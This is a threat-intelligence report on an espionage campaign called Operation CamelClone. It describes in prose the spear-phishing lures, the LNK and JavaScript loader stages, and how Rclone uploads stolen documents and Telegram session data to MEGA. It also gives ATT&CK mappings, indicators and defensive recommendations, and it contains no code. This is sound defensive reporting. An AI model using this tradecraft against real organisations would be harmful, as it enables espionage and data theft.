A stealthy campaign abusing legitimate tools and cloud services highlights the evolution of modern intelligence-driven cyber operations
CyberShelter Threat Intelligence Team has identified an ongoing advanced cyber espionage campaign, tracked as Operation CamelClone, targeting high-value sectors including government, defense, diplomacy, and energy across multiple countries.
The campaign leverages spear-phishing, malicious shortcut files, and a custom JavaScript loader to deploy legitimate tools like Rclone for covert data exfiltration.
Unlike financially motivated attacks, this operation demonstrates clear indicators of state-aligned intelligence gathering, focusing on long-term access and sensitive data collection.
Targeted Sectors and Geography
Primary Targets
- Government agencies
- Defense and military organizations
- Diplomatic and foreign affairs entities
- Energy and strategic resource sectors
Countries Observed
- Algeria
- Mongolia
- Ukraine
- Kuwait
The targeting pattern strongly suggests geopolitical intelligence objectives rather than opportunistic cybercrime.
Attack Chain Breakdown
Stage 1: Spear-Phishing Delivery
Attackers initiate the campaign using phishing emails containing ZIP archives disguised as official or diplomatic documents.
Common lures include:
- Cooperation proposals
- Defense-related documents
- Government communications
Each archive contains:
- A malicious LNK (shortcut file)
- A decoy image or document
Stage 2: LNK Execution and Initial Payload
When the LNK file is executed:
- PowerShell commands are triggered
- Payload is downloaded from attacker-controlled infrastructure
- Execution occurs in temporary directories
This stage uses obfuscation and encoded commands to evade detection.
Stage 3: HOPPINGANT Loader Deployment
The downloaded JavaScript loader (HOPPINGANT):
- Executes encoded PowerShell payloads
- Drops decoy documents to avoid suspicion
- Extracts and deploys Rclone for exfiltration
The loader uses XOR encoding and Windows Script Host to remain stealthy.
Data Exfiltration Strategy
Attackers use Rclone (v1.70.3), a legitimate cloud synchronization tool, to exfiltrate sensitive data.
Targeted Data
- Documents (DOC, PDF, TXT)
- Desktop files
- Communication data
- Telegram Desktop session data (tdata)
Exfiltration Method
- Upload to MEGA cloud storage
- Use of anonymous email services for account creation
This approach allows attackers to blend malicious activity with legitimate traffic.
Infrastructure and Evasion Techniques
Operation CamelClone stands out for its use of legitimate services:
- Payload hosting via public domains
- Cloud storage (MEGA) for data exfiltration
- Anonymous email providers (onionmail)
- Consistent tooling and configuration across campaigns
This reduces detection probability and complicates attribution.
MITRE ATT&CK Mapping
Key techniques observed include:
- Spearphishing Attachment (T1566.001)
- PowerShell Execution (T1059.001)
- JavaScript Execution (T1059.007)
- Obfuscated Files (T1027)
- Web-Based C2 Communication (T1071.001)
- Cloud Exfiltration (T1567.002)
Indicators of Compromise (Highlights)
Malicious Domain
- filebulldogs[.]com
Email Infrastructure
- Multiple onionmail-based accounts
Artifacts
- Malicious LNK loaders
- JavaScript payloads
- Rclone executables
- Obfuscated scripts
CyberShelter Recommendations
Immediate Actions
- Block known malicious domains and monitor outbound cloud traffic
- Restrict execution of PowerShell and suspicious scripts
- Detect unauthorized use of Rclone within endpoints
- Monitor access to Telegram desktop data directories
Security Enhancements
- Strengthen phishing awareness programs
- Block or sandbox unknown ZIP attachments
- Implement endpoint detection for script-based execution
- Enhance visibility into cloud storage usage
Strategic Insight
Operation CamelClone highlights a critical shift in cyber threats:
Attackers are no longer relying on malware alone—they are weaponizing legitimate tools and trusted platforms.
This approach enables:
- Stealthy long-term persistence
- Evasion of traditional security controls
- Blending into normal enterprise activity
For organizations, this means detection must evolve from signature-based methods to behavioral and contextual analysis.